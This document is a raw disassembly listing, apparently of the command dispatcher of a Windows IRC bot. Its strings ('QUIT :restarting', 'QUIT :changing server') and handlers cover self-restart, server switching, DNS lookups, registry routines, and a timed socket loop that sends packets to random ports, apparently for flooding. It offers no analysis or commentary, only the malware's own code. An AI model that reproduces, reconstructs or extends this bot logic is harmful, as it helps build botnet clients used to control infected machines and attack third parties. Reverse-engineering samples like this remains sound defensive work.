cmp ecx, 180h
ja loc_4083EE
lea eax, [ebp+var_360]
push eax
mov eax, [esi+4]
inc eax
push eax
call sub_409AD3
push eax
lea eax, [ebp+var_360]
push eax
call sub_409EB3
mov esi, eax
lea eax, [ebp+var_360]
push esi
push eax
call sub_409E33
add esp, 18h
lea eax, [ebp+var_360]
mov [ebp+esi+var_360], bl
push eax
push offset dword_413D14
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_4075E9: ; CODE XREF: sub_40735A+1F7�j
cmp edi, dword_413D04
jnz short loc_407605
push dword ptr [esi+4]
lea eax, [ebp+var_1BC]
push eax
call sub_404317
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407605: ; CODE XREF: sub_40735A+295�j
cmp edi, dword_413CF4
jnz short loc_40761E
lea eax, [ebp+var_1BC]
push eax
call sub_404202
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_40761E: ; CODE XREF: sub_40735A+2B1�j
cmp edi, dword_413CE4
jnz short loc_40766E
xor ebx, ebx
mov [ebp+var_20], 1
cmp [ebp+var_31], bl
jz short loc_407642
lea eax, [ebp+var_1BC]
push eax
call sub_40D1B3
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_407642: ; CODE XREF: sub_40735A+2D5�j
cmp [ebp+var_23], bl
lea eax, [ebp+var_1BC]
push eax
jz short loc_407658
call sub_40D5AA
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_407658: ; CODE XREF: sub_40735A+2F2�j
call sub_40D1B3
lea eax, [ebp+var_1BC]
push eax
call sub_40D5AA
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_40766E: ; CODE XREF: sub_40735A+2CA�j
cmp edi, dword_413CD4
jnz short loc_407687
lea eax, [ebp+var_1BC]
push eax
call sub_40F515
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_407687: ; CODE XREF: sub_40735A+31A�j
cmp edi, dword_413CC8
jnz short loc_4076AB
mov eax, [ebp+arg_18]
add esi, 4
add eax, 4
push eax
lea eax, [ebp+var_1BC]
push esi
push eax
call sub_410542
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_4076AB: ; CODE XREF: sub_40735A+333�j
cmp edi, dword_413CBC
jz loc_4083E2
cmp edi, dword_413CB0
jz loc_4083E2
cmp edi, dword_413CA0
jnz short loc_4076E2
push dword ptr [esi+8]
lea eax, [ebp+var_1BC]
push dword ptr [esi+4]
push eax
call sub_4027CB
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_4076E2: ; CODE XREF: sub_40735A+36F�j
cmp edi, dword_413C94
jnz short loc_407704
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
lea eax, [ebp+var_1BC]
push dword ptr [esi+4]
push eax
call sub_401FA3
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_407704: ; CODE XREF: sub_40735A+38E�j
cmp edi, dword_413C84
jnz short loc_407726
push dword ptr [esi+0Ch]
lea eax, [ebp+var_1BC]
push dword ptr [esi+8]
push dword ptr [esi+4]
push eax
call sub_404240
jmp loc_408121
; ---------------------------------------------------------------------------
loc_407726: ; CODE XREF: sub_40735A+3B0�j
cmp edi, dword_413C74
jnz short loc_407748
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
lea eax, [ebp+var_1BC]
push dword ptr [esi+4]
push eax
call sub_41041B
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_407748: ; CODE XREF: sub_40735A+3D2�j
cmp edi, dword_413C64
jnz short loc_40777B
mov esi, [ebp+arg_18]
mov eax, [esi+4]
test eax, eax
jz loc_4083EE
push eax
push 80000001h
call sub_401000
push dword ptr [esi+4]
push 80000002h
call sub_401000
jmp loc_408121
; ---------------------------------------------------------------------------
loc_40777B: ; CODE XREF: sub_40735A+3F4�j
cmp edi, dword_413C54
jnz short loc_407793
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40110A
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_407793: ; CODE XREF: sub_40735A+427�j
cmp edi, dword_413C48
jnz short loc_4077B4
push 0
loc_40779D: ; CODE XREF: sub_40735A+463�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1BC]
push eax
call sub_4014B0
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_4077B4: ; CODE XREF: sub_40735A+43F�j
cmp edi, dword_413C3C
jnz short loc_4077BF
push eax
jmp short loc_40779D
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: sub_40735A+460�j
cmp edi, dword_413C30
jnz short loc_4077D8
lea eax, [ebp+var_1BC]
push eax
call sub_406A80
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_4077D8: ; CODE XREF: sub_40735A+46B�j
cmp edi, dword_413C28
jnz short loc_4077EF
push offset dword_418C78
push offset dword_413C18
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_4077EF: ; CODE XREF: sub_40735A+484�j
cmp edi, dword_413C0C
jnz short loc_40780E
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1BC]
push eax
call sub_40EA34
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_40780E: ; CODE XREF: sub_40735A+49B�j
cmp edi, dword_413C00
jz loc_4083C2
cmp edi, dword_413BF4
jz loc_4083C2
cmp edi, dword_413BE8
jz loc_4083C2
cmp edi, dword_413BD8
jnz short loc_40784B
lea eax, [ebp+var_1BC]
push eax
call sub_40EB64
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_40784B: ; CODE XREF: sub_40735A+4DE�j
cmp edi, dword_413BC4
jnz short loc_407897
mov esi, [ebp+arg_18]
mov eax, [esi+4]
test eax, eax
jz short loc_407883
push eax
call sub_4104C3
test eax, eax
pop ecx
jz loc_4083EE
push 104h
push dword ptr [esi+4]
push offset dword_418970
call sub_4052A6
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_407883: ; CODE XREF: sub_40735A+501�j
push offset dword_41885C
push offset dword_418970
loc_40788D: ; CODE XREF: sub_40735A+6A3�j
; sub_40735A+ECB�j
call sub_410820 ; _mbscpy
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407897: ; CODE XREF: sub_40735A+4F7�j
cmp edi, dword_413BB4
jnz short loc_4078C2
push dword ptr [esi+14h]
lea eax, [ebp+var_1BC]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
push eax
call sub_40EF0E
loc_4078BA: ; CODE XREF: sub_40735A+1083�j
add esp, 18h
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_4078C2: ; CODE XREF: sub_40735A+543�j
cmp edi, dword_413BAC
jnz loc_40796F
mov esi, [ebp+arg_18]
xor ebx, ebx
mov eax, [esi+4]
cmp eax, ebx
jz loc_4083EE
push eax
call sub_410826 ; strlen
shl eax, 1
push eax
call sub_41082C ; malloc
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_4083EE
push dword ptr [esi+4]
call sub_410826 ; strlen
push eax
push edi
push dword ptr [esi+4]
call sub_409B9F
add esp, 10h
lea eax, [ebp+var_1BC]
push edi
push offset dword_413B90
push eax
call sub_408D50
push edi
call sub_410832 ; free
mov esi, 1000h
lea eax, [ebp+var_19AC]
push esi
push eax
call sub_40AB46
add esp, 18h
call sub_41084A ; clock
mov ebx, eax
mov edi, 186A0h
loc_407946: ; CODE XREF: sub_40735A+604�j
lea eax, [ebp+var_59AC]
push esi
push eax
lea eax, [ebp+var_19AC]
push eax
call sub_409B9F
add esp, 0Ch
dec edi
jnz short loc_407946
call sub_41084A ; clock
sub eax, ebx
push eax
push offset aItTookMeUms_ ; "It took me %ums."
jmp short loc_4079E3
; ---------------------------------------------------------------------------
loc_40796F: ; CODE XREF: sub_40735A+56E�j
cmp edi, dword_413B70
jnz short loc_4079CA
mov edi, [ebp+arg_18]
xor ebx, ebx
mov eax, [edi+4]
cmp eax, ebx
jz loc_4083EE
push eax
call sub_410826 ; strlen
push eax
call sub_41082C ; malloc
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_4083EE
push esi
push dword ptr [edi+4]
call sub_409AD3
pop ecx
mov [eax+esi], bl
pop ecx
lea eax, [ebp+var_1BC]
push esi
push offset dword_413B54
push eax
call sub_408D50
push esi
call sub_410832 ; free
jmp loc_408121
; ---------------------------------------------------------------------------
loc_4079CA: ; CODE XREF: sub_40735A+61B�j
cmp edi, dword_413B44
jnz short loc_407A02
mov esi, [esi+4]
test esi, esi
jnz short loc_4079F7
push offset dword_418C78
push offset dword_413B30
loc_4079E3: ; CODE XREF: sub_40735A+F9�j
; sub_40735A+1EC�j ...
lea eax, [ebp+var_1BC]
push eax
call sub_408D50
loc_4079EF: ; CODE XREF: sub_40735A+118�j
; sub_40735A+34C�j ...
add esp, 0Ch
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_4079F7: ; CODE XREF: sub_40735A+67D�j
push esi
push offset dword_418C78
jmp loc_40788D
; ---------------------------------------------------------------------------
loc_407A02: ; CODE XREF: sub_40735A+676�j
cmp edi, dword_413B24
jnz short loc_407A17
push dword ptr [esi+4]
call sub_40678D
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_407A17: ; CODE XREF: sub_40735A+6AE�j
cmp edi, dword_413B18
jnz short loc_407A33
push dword ptr [esi+4]
lea eax, [ebp+var_1BC]
push eax
call sub_4030A7
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407A33: ; CODE XREF: sub_40735A+6C3�j
cmp edi, dword_413B08
jnz short loc_407A48
push dword ptr [esi+4]
call sub_406868
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_407A48: ; CODE XREF: sub_40735A+6DF�j
cmp edi, dword_413AFC
jnz short loc_407A67
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1BC]
push eax
call sub_4043B3
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407A67: ; CODE XREF: sub_40735A+6F4�j
cmp edi, dword_413AEC
jnz short loc_407A83
push dword ptr [esi+4]
lea eax, [ebp+var_1BC]
push eax
call sub_40DD96
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407A83: ; CODE XREF: sub_40735A+713�j
cmp edi, dword_413AE0
jnz short loc_407AA8
push dword ptr [esi+10h]
lea eax, [ebp+var_1BC]
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
push eax
call sub_406E50
jmp loc_40837F
; ---------------------------------------------------------------------------
loc_407AA8: ; CODE XREF: sub_40735A+72F�j
cmp edi, dword_413AD4
jnz short loc_407AC7
push dword ptr [esi+8]
lea eax, [ebp+var_1BC]
push dword ptr [esi+4]
push eax
call sub_4070F0
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_407AC7: ; CODE XREF: sub_40735A+754�j
cmp edi, dword_413AC8
jnz short loc_407AEA
push offset dword_41885C
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_408E60
pop ecx
pop ecx
push 36EE80h
jmp loc_407BA1
; ---------------------------------------------------------------------------
loc_407AEA: ; CODE XREF: sub_40735A+773�j
cmp edi, dword_413AA8
jnz short loc_407B38
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
jz loc_4083EE
mov edi, offset dword_4177EC
push eax
push edi
call sub_410820 ; _mbscpy
mov esi, [esi+8]
pop ecx
cmp esi, ebx
pop ecx
jnz short loc_407B19
mov esi, offset byte_417B60
loc_407B19: ; CODE XREF: sub_40735A+7B8�j
push esi
mov esi, offset dword_418A78
push esi
call sub_410820 ; _mbscpy
pop ecx
pop ecx
push esi
push edi
loc_407B29: ; CODE XREF: sub_40735A+801�j
push offset dword_413A9C
call sub_408E60
jmp loc_4079EF
; ---------------------------------------------------------------------------
loc_407B38: ; CODE XREF: sub_40735A+796�j
cmp edi, dword_413A90
jnz short loc_407B5D
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
jz loc_4083EE
mov esi, [esi+8]
cmp esi, ebx
jnz short loc_407B59
mov esi, offset byte_417B60
loc_407B59: ; CODE XREF: sub_40735A+7F8�j
push esi
push eax
jmp short loc_407B29
; ---------------------------------------------------------------------------
loc_407B5D: ; CODE XREF: sub_40735A+7E4�j
cmp edi, dword_413A84
jnz short loc_407B7B
mov esi, [esi+4]
test esi, esi
jz loc_4083EE
push esi
push offset dword_413A7C
jmp loc_407408
; ---------------------------------------------------------------------------
loc_407B7B: ; CODE XREF: sub_40735A+809�j
cmp edi, dword_413A70
jnz short loc_407BAC
mov esi, [esi+4]
test esi, esi
jz loc_4083EE
push esi
call sub_41088C ; atoi
cmp eax, 927C0h
pop ecx
jg loc_4083EE
push eax
loc_407BA1: ; CODE XREF: sub_40735A+78B�j
call ds:dword_4110A4 ; Sleep
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_407BAC: ; CODE XREF: sub_40735A+827�j
cmp edi, dword_413A68
jnz short loc_407BDB
mov esi, [esi+4]
xor ebx, ebx
cmp esi, ebx
jz loc_4083EE
mov eax, [ebp+arg_18]
mov eax, [eax+8]
cmp eax, ebx
jz loc_4083EE
push eax
push esi
call sub_408CDE
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407BDB: ; CODE XREF: sub_40735A+858�j
cmp edi, dword_413A5C
jnz short loc_407C0A
mov esi, [esi+4]
xor ebx, ebx
cmp esi, ebx
jz loc_4083EE
mov eax, [ebp+arg_18]
mov eax, [eax+8]
cmp eax, ebx
jz loc_4083EE
push eax
push esi
call sub_408C6C
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407C0A: ; CODE XREF: sub_40735A+887�j
cmp edi, dword_413A54
jnz short loc_407C26
mov eax, [ebp+arg_18]
mov eax, [eax+4]
test eax, eax
jz loc_4083EE
push eax
jmp loc_4083BB
; ---------------------------------------------------------------------------
loc_407C26: ; CODE XREF: sub_40735A+8B6�j
cmp edi, dword_413A48
jnz short loc_407C70
mov esi, [esi+4]
xor ebx, ebx
cmp esi, ebx
jnz short loc_407C54
cmp dword_417B68, ebx
mov eax, offset aOn ; "on"
jnz short loc_407C49
mov eax, offset aOff ; "off"
loc_407C49: ; CODE XREF: sub_40735A+8E8�j
push eax
push offset aDebugModeIsS_ ; "Debug mode is %s."
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_407C54: ; CODE XREF: sub_40735A+8DB�j
push offset aOn ; "on"
push esi
call sub_410C94 ; _strcmpi
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov dword_417B68, eax
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_407C70: ; CODE XREF: sub_40735A+8D2�j
cmp edi, dword_413A1C
jnz short loc_407C89
lea eax, [ebp+var_1BC]
push eax
call sub_40FEA2
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_407C89: ; CODE XREF: sub_40735A+91C�j
cmp edi, dword_413A10
jnz short loc_407CAB
cmp dword ptr [esi+4], 0
jz loc_4083EE
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_413A08
jmp loc_407408
; ---------------------------------------------------------------------------
loc_407CAB: ; CODE XREF: sub_40735A+935�j
cmp edi, dword_4139FC
jz loc_4083B6
cmp edi, dword_4139F0
jz loc_4083B6
cmp edi, dword_4139E8
jz loc_4083B6
cmp edi, dword_4139DC
jnz short loc_407D24
lea eax, [ebp+var_2E4]
push 104h
xor ebx, ebx
push eax
push ebx
call ds:dword_411094 ; GetModuleHandleA
push eax
call ds:dword_411098 ; GetModuleFileNameA
push ebx
push ebx
lea eax, [ebp+var_2E4]
push ebx
push eax
push offset aOpen ; "open"
push ebx
call ds:dword_4111E4
cmp eax, 20h
jbe loc_4083EE
push offset aQuitRestarting ; "QUIT :restarting"
call sub_408E60
pop ecx
push ebx
call ds:dword_411064 ; ExitProcess
loc_407D24: ; CODE XREF: sub_40735A+97B�j
cmp edi, dword_4139D0
jnz short loc_407D52
mov esi, [esi+4]
test esi, esi
jz loc_4083EE
movzx eax, byte ptr [esi]
push eax
push eax
push offset dword_4139A0
loc_407D41: ; CODE XREF: sub_40735A+BD3�j
lea eax, [ebp+var_1BC]
push eax
call sub_408D50
jmp loc_408121
; ---------------------------------------------------------------------------
loc_407D52: ; CODE XREF: sub_40735A+9D0�j
cmp edi, dword_413990
jnz short loc_407D64
call sub_404BC3
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_407D64: ; CODE XREF: sub_40735A+9FE�j
cmp edi, dword_413988
jz loc_4083A1
cmp edi, dword_41397C
jz loc_4083A1
cmp edi, dword_413974
jnz short loc_407D9B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1BC]
push eax
call sub_4087CE
jmp loc_4083B3
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_40735A+A28�j
cmp edi, dword_413968
jz loc_408384
cmp edi, dword_413958
jz loc_408384
cmp edi, dword_413950
jnz loc_407EBF
xor ebx, ebx
cmp [esi+4], ebx
jnz short loc_407DCD
mov dword ptr [esi+4], offset byte_417B60
loc_407DCD: ; CODE XREF: sub_40735A+A6A�j
lea eax, [ebp+arg_14]
push eax
push ebx
push ebx
push dword ptr [esi+4]
call dword_417BB4 ; getaddrinfo
test eax, eax
jnz loc_407F38
mov eax, [ebp+arg_14]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_407EB1
mov edi, 3E8h
loc_407DF7: ; CODE XREF: sub_40735A+B51�j
push 2
push ebx
push ebx
lea eax, [ebp+var_9AC]
push 401h
push eax
mov eax, [ebp+arg_18]
push dword ptr [eax+10h]
push dword ptr [eax+18h]
call dword_417BB8 ; getnameinfo
test eax, eax
jnz loc_407EA0
mov eax, [ebp+arg_18]
mov ecx, [eax+4]
cmp ecx, 2
jnz short loc_407E53
mov eax, [esi+4]
cmp [eax], bl
jnz short loc_407E35
mov eax, offset dword_41394C
loc_407E35: ; CODE XREF: sub_40735A+AD4�j
lea ecx, [ebp+var_9AC]
push ecx
push eax
push offset dword_413928
loc_407E42: ; CODE XREF: sub_40735A+B17�j
lea eax, [ebp+var_1BC]
push eax
call sub_408D50
add esp, 10h
jmp short loc_407E99
; ---------------------------------------------------------------------------
loc_407E53: ; CODE XREF: sub_40735A+ACD�j
mov eax, [esi+4]
cmp ecx, 17h
jnz short loc_407E73
cmp [eax], bl
jnz short loc_407E64
mov eax, offset dword_41394C
loc_407E64: ; CODE XREF: sub_40735A+B03�j
lea ecx, [ebp+var_9AC]
push ecx
push eax
push offset byte_413904
jmp short loc_407E42
; ---------------------------------------------------------------------------
loc_407E73: ; CODE XREF: sub_40735A+AFF�j
cmp [eax], bl
jnz short loc_407E7C
mov eax, offset dword_41394C
loc_407E7C: ; CODE XREF: sub_40735A+B1B�j
lea edx, [ebp+var_9AC]
push edx
push ecx
push eax
lea eax, [ebp+var_1BC]
push offset dword_4138D0
push eax
call sub_408D50
add esp, 14h
loc_407E99: ; CODE XREF: sub_40735A+AF7�j
push edi
call ds:dword_4110A4 ; Sleep
loc_407EA0: ; CODE XREF: sub_40735A+ABE�j
mov eax, [ebp+arg_18]
mov eax, [eax+1Ch]
cmp eax, ebx
mov [ebp+arg_18], eax
jnz loc_407DF7
loc_407EB1: ; CODE XREF: sub_40735A+A92�j
push [ebp+arg_14]
call dword_417BBC ; freeaddrinfo
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_407EBF: ; CODE XREF: sub_40735A+A5F�j
cmp edi, dword_4138C4
jnz short loc_407F45
xor ebx, ebx
cmp [esi+4], ebx
jnz short loc_407ED5
mov dword ptr [esi+4], offset byte_417B60
loc_407ED5: ; CODE XREF: sub_40735A+B72�j
lea eax, [ebp+arg_18]
push eax
push ebx
push ebx
push dword ptr [esi+4]
call dword_417BB4 ; getaddrinfo
test eax, eax
jnz short loc_407F38
push 4
push ebx
push ebx
lea eax, [ebp+var_9AC]
push 401h
push eax
mov eax, [ebp+arg_18]
push dword ptr [eax+10h]
push dword ptr [eax+18h]
call dword_417BB8 ; getnameinfo
push [ebp+arg_18]
test eax, eax
jnz short loc_407F32
call dword_417BBC ; freeaddrinfo
mov esi, [esi+4]
cmp [esi], bl
jnz short loc_407F20
mov esi, offset dword_41394C
loc_407F20: ; CODE XREF: sub_40735A+BBF�j
lea eax, [ebp+var_9AC]
push eax
push esi
push offset dword_4138A8
jmp loc_407D41
; ---------------------------------------------------------------------------
loc_407F32: ; CODE XREF: sub_40735A+BB2�j
call dword_417BBC ; freeaddrinfo
loc_407F38: ; CODE XREF: sub_40735A+A84�j
; sub_40735A+B8C�j
push dword ptr [esi+4]
push offset dword_41388C
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_407F45: ; CODE XREF: sub_40735A+B6B�j
cmp edi, dword_41387C
jnz loc_408028
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
jz loc_4083EE
push eax
call sub_410826 ; strlen
cmp eax, 0Ah
pop ecx
jbe loc_4083EE
push dword ptr [esi+4]
call sub_410826 ; strlen
push 4
push offset a2002 ; "2002"
push dword ptr [esi+4]
mov edi, eax
call sub_410AFA ; memcmp
add esp, 10h
test eax, eax
jnz loc_40801B
mov eax, [esi+4]
add eax, edi
mov cl, [eax-9]
mov byte ptr [ebp+var_C], cl
mov cl, [eax-8]
mov byte ptr [ebp+var_C+1], cl
mov byte ptr [ebp+var_C+2], bl
mov cl, [eax-7]
mov byte ptr [ebp+var_C+3], cl
mov cl, [eax-6]
mov [ebp+var_8], cl
mov [ebp+var_7], bl
mov cl, [eax-4]
mov [ebp+var_6], cl
mov cl, [eax-3]
mov [ebp+var_5], cl
mov [ebp+var_4], bl
mov cl, [eax-2]
mov [ebp+var_3], cl
mov al, [eax-1]
mov [ebp+var_2], al
lea eax, [ebp+var_3]
push eax
mov [ebp+var_1], bl
call sub_407290
pop ecx
push eax
lea eax, [ebp+var_6]
push eax
call sub_407290
pop ecx
push eax
lea eax, [ebp+var_C+3]
push eax
call sub_407290
pop ecx
push eax
lea eax, [ebp+var_C]
push eax
call sub_407290
pop ecx
push eax
lea eax, [ebp+var_1BC]
push dword ptr [esi+4]
push offset dword_413844
push eax
call sub_408D50
add esp, 1Ch
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_40801B: ; CODE XREF: sub_40735A+C32�j
push dword ptr [esi+4]
push offset dword_413828
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_408028: ; CODE XREF: sub_40735A+BF1�j
cmp edi, dword_41381C
jnz loc_4080EC
call sub_41084A ; clock
mov [ebp+arg_0], eax
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
mov [ebp+arg_14], ebx
mov byte ptr [ebp+arg_18+3], bl
call sub_410850 ; memset
add esp, 0Ch
mov [ebp+var_10], 2
call sub_41084A ; clock
sub eax, [ebp+arg_0]
mov edi, 3E8h
cmp eax, edi
jnb short loc_4080D9
loc_40806A: ; CODE XREF: sub_40735A+D73�j
push 0FFFFh
push 1
call sub_40AADE
pop ecx
pop ecx
push eax
call ds:dword_411248 ; htons
push 4
push ebx
mov [ebp+var_E], ax
call sub_40315E
pop ecx
mov [ebp+var_C], eax
pop ecx
push ebx
push 2
push 2
call ds:dword_41122C ; socket
mov esi, eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_411208 ; connect
push ebx
lea eax, [ebp+arg_18+3]
push 1
push eax
push esi
call ds:dword_411220 ; send
push esi
call ds:dword_411240 ; closesocket
add [ebp+arg_14], 2Bh
call sub_41084A ; clock
sub eax, [ebp+arg_0]
cmp eax, edi
jb short loc_40806A
mov eax, [ebp+arg_14]
cmp eax, 400h
ja short loc_4080DE
loc_4080D9: ; CODE XREF: sub_40735A+D0E�j
mov eax, 400h
loc_4080DE: ; CODE XREF: sub_40735A+D7D�j
shr eax, 0Ah
push eax
push offset dword_413804
jmp loc_4079E3
; ---------------------------------------------------------------------------
loc_4080EC: ; CODE XREF: sub_40735A+CD4�j
cmp edi, dword_4137FC
jz loc_408362
cmp edi, dword_4137F0
jz loc_408362
cmp edi, dword_4137E4
jnz short loc_408129
push dword ptr [esi+0Ch]
lea eax, [ebp+var_1BC]
push dword ptr [esi+8]
push dword ptr [esi+4]
push eax
call sub_40EC6F
loc_408121: ; CODE XREF: sub_40735A+3C7�j
; sub_40735A+41C�j ...
add esp, 10h
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_408129: ; CODE XREF: sub_40735A+DB0�j
cmp edi, dword_4137DC
jz loc_408351
cmp edi, dword_4137D0
jz loc_408351
cmp edi, dword_4137C8
jz loc_408340
cmp edi, dword_4137BC
jz loc_408340
cmp edi, dword_4137AC
jnz short loc_408198
push eax
push offset a9252 ; "9252"
call sub_4035FB
pop ecx
mov esi, eax
pop ecx
lea eax, [ebp+var_1BC]
push esi
push offset dword_412B28
push eax
call sub_408D50
add esp, 0Ch
test esi, esi
jz loc_4083EE
push esi
call sub_4038E1
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_408198: ; CODE XREF: sub_40735A+E05�j
cmp edi, dword_413798
jnz short loc_4081B1
lea eax, [ebp+var_1BC]
push eax
call sub_4062EC
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_4081B1: ; CODE XREF: sub_40735A+E44�j
cmp edi, dword_413790
jz short loc_40822A
cmp edi, dword_413784
jz short loc_40822A
cmp edi, dword_41377C
jnz loc_4083EE
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
jz loc_4083EE
cmp [esi+8], ebx
jz loc_4083EE
push 2
push offset aId ; "id"
push eax
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_408206
push dword ptr [esi+8]
push offset byte_418BF8
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_408206: ; CODE XREF: sub_40735A+E9B�j
push offset aUsername ; "username"
push dword ptr [esi+4]
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jnz loc_4083EE
push dword ptr [esi+8]
push offset byte_418D78
jmp loc_40788D
; ---------------------------------------------------------------------------
loc_40822A: ; CODE XREF: sub_40735A+E5D�j
; sub_40735A+E65�j
mov esi, [esi+4]
xor ebx, ebx
cmp esi, ebx
jz short loc_40823F
push esi
call sub_41088C ; atoi
pop ecx
mov [ebp+arg_14], eax
jmp short loc_408242
; ---------------------------------------------------------------------------
loc_40823F: ; CODE XREF: sub_40735A+ED7�j
mov [ebp+arg_14], ebx
loc_408242: ; CODE XREF: sub_40735A+EE3�j
call sub_40639B
mov edi, 15180h
xor edx, edx
mov esi, edi
mov ecx, eax
div esi
xor edx, edx
mov esi, 0E10h
mov ebx, esi
push 3Ch
mov [ebp+arg_18], eax
mov eax, ecx
mov ecx, edi
div ecx
mov ecx, edx
xor edx, edx
mov eax, ecx
div ebx
xor edx, edx
mov [ebp+var_14], eax
mov eax, ecx
mov ecx, esi
div ecx
pop ecx
mov eax, edx
xor edx, edx
div ecx
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
cmp [ebp+arg_18], eax
jb loc_4083EE
call sub_40640D
xor edx, edx
mov ebx, edi
mov ecx, eax
push 3Ch
div ebx
xor edx, edx
mov [ebp+arg_10], eax
mov eax, ecx
div edi
mov edi, esi
mov ecx, edx
xor edx, edx
mov eax, ecx
div edi
xor edx, edx
mov [ebp+arg_8], eax
mov eax, ecx
div esi
pop ecx
push 1
mov eax, edx
xor edx, edx
div ecx
mov edx, offset byte_417B60
mov ecx, offset dword_4131C0
mov [ebp+arg_14], edx
mov ebx, eax
pop eax
cmp ebx, eax
jz short loc_4082DC
mov [ebp+arg_14], ecx
loc_4082DC: ; CODE XREF: sub_40735A+F7D�j
cmp [ebp+arg_8], eax
mov [ebp+arg_0], edx
jz short loc_4082E7
mov [ebp+arg_0], ecx
loc_4082E7: ; CODE XREF: sub_40735A+F88�j
cmp [ebp+arg_10], eax
mov [ebp+arg_C], edx
jz short loc_4082F2
mov [ebp+arg_C], ecx
loc_4082F2: ; CODE XREF: sub_40735A+F93�j
cmp [ebp+var_18], eax
mov edi, edx
jz short loc_4082FB
mov edi, ecx
loc_4082FB: ; CODE XREF: sub_40735A+F9D�j
cmp [ebp+var_14], eax
mov esi, edx
jz short loc_408304
mov esi, ecx
loc_408304: ; CODE XREF: sub_40735A+FA6�j
cmp [ebp+arg_18], eax
jnz short loc_40830B
mov ecx, edx
loc_40830B: ; CODE XREF: sub_40735A+FAD�j
push [ebp+arg_14]
lea eax, [ebp+var_1BC]
push ebx
push [ebp+arg_0]
push [ebp+arg_8]
push [ebp+arg_C]
push [ebp+arg_10]
push edi
push [ebp+var_18]
push esi
push [ebp+var_14]
push ecx
push [ebp+arg_18]
push offset dword_4136F8
push eax
call sub_408D50
add esp, 38h
jmp loc_4083EE
; ---------------------------------------------------------------------------
loc_408340: ; CODE XREF: sub_40735A+DED�j
; sub_40735A+DF9�j
lea eax, [ebp+var_1BC]
push eax
call sub_40605E
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_408351: ; CODE XREF: sub_40735A+DD5�j
; sub_40735A+DE1�j
lea eax, [ebp+var_1BC]
push eax
call sub_405BB3
jmp loc_4083ED
; ---------------------------------------------------------------------------
loc_408362: ; CODE XREF: sub_40735A+D98�j
; sub_40735A+DA4�j
push offset dword_41796C
push 398h
push 0
lea eax, [ebp+var_1BC]
push offset dword_4136D4
push eax
call sub_408D50
loc_40837F: ; CODE XREF: sub_40735A+749�j
add esp, 14h
jmp short loc_4083EE
; ---------------------------------------------------------------------------
loc_408384: ; CODE XREF: sub_40735A+A47�j
; sub_40735A+A53�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_408E60
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
call sub_408BA7
jmp loc_408121
; ---------------------------------------------------------------------------
